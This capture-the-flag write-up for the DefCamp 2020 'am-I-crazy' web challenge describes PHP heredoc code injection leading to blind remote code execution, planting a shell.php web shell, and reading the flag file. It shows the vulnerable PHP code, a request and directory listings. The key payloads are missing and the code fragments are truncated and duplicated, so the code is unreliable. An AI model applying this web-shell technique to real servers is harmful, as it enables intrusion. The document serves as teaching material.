Tags: web rce php
# DefCamp CTF 2020 – am-I-crazy
* **Category:** web
* **Points:** ?
## Challenge
> You might see but you cannot feel.
> Flag format: CTF{sha256}
> The challenge was proposed by BIT SENTINEL.
## Solution
The page will show the following HTML code.
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<div class="container">
<div class="jumbotron">
<h1 class="display-3">AM I CRAZY</h1>
Use a random password and the bellow button to generate or restore to the initial state the challenge.
<form method="POST" action="/">
<div class="form-group" style=""><label>Password:</label><input pattern=".{8,}" name="password" type="password" class="form-control" style="display: block; position: static; float: none;" required></div>
<button type="submit" class="btn btn-lg btn-success" href="#" role="button">Generate</button>
You have to insert a password with at least 8 chars.
Inserting 8 `a`s will open the following URL `` with the following content.
10 15){
$_GET['tryharder'] = 0;
$contents = file_get_contents(__FILE__);
$search_pattern = '/\$var = <<<xd\s*(.*)\s*xd/im';
preg_match($search_pattern, $contents, $matches);
$new_contents = preg_replace_callback($search_pattern, function($matches) {
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);
}, $contents);
file_put_contents(__FILE__, $new_contents, LOCK_EX);
After the button press, you are redirected to a page like the following URL: `/secrets/3db406bb8ed1399d75a88f31b9aac730/index.php`
Here you can specify a value for the `tryharder` parameter.
GET /secrets/3db406bb8ed1399d75a88f31b9aac730/index.php?tryharder=<your_value_here> HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
A payload can be the following, in order to use *code injection* to break the *heredoc* and obtain a blind RCE.
Payload must be URL-encoded.
Sending it, the page will become the following.
1 15){
$_GET['tryharder'] = 0;
$contents = file_get_contents(__FILE__);
$search_pattern = '/\$var = <<<xdxd;
preg_match($search_pattern, $contents, $matches);
$new_contents = preg_replace_callback($search_pattern, function($matches) {
return str_replace($matches[1], $_GET['tryharder'], $matches[0]);
}, $contents);
file_put_contents(__FILE__, $new_contents, LOCK_EX);
Using the blind RCE, you can execute a command to create another PHP page with a more useful web shell. For example, the following code can be used.
echo 'Output:<br />' > shell.php
Payload must be URL-encoded.
Now you have a simpler web shell to use that returns the output of executed commands. Commands are passed via GET `0` URL parameter.
With this you can discover where the flag is.
total 56
drwxrwxrwx 1 www-data www-data 4096 Dec 6 12:25 .
drwxr-xr-x 1 root root 4096 Sep 12 2019 ..
-rw-r--r-- 2 www www 2 Dec 6 10:57 apache2.pid
-rw-rw-r-- 1 root root 153 Dec 1 08:31 flag.php
lrwxrwxrwx 1 www www 6 Dec 6 12:25 html -> l/html
-rw-rw-r-- 1 root root 2692 Dec 1 08:31 index.php
drwxrwxr-x 1 www www 24576 Dec 6 19:18 secrets
drwxrwxr-x 1 www www 24576 Dec 6 19:18 secrets
You can copy the flag file in the current directory.
total 44
drwxr-xr-x 2 www www 4096 Dec 6 19:35 .
drwxrwxr-x 1 www www 24576 Dec 6 19:18 ..
-rw-r--r-- 1 www www 153 Dec 6 19:35 flag.php
-rw-r--r-- 1 www www 770 Dec 6 19:31 index.php
-rw-r--r-- 1 www www 57 Dec 6 19:31 shell.php
-rw-r--r-- 1 www www 57 Dec 6 19:31 shell.php
And print the flag file content.
The flag is the following.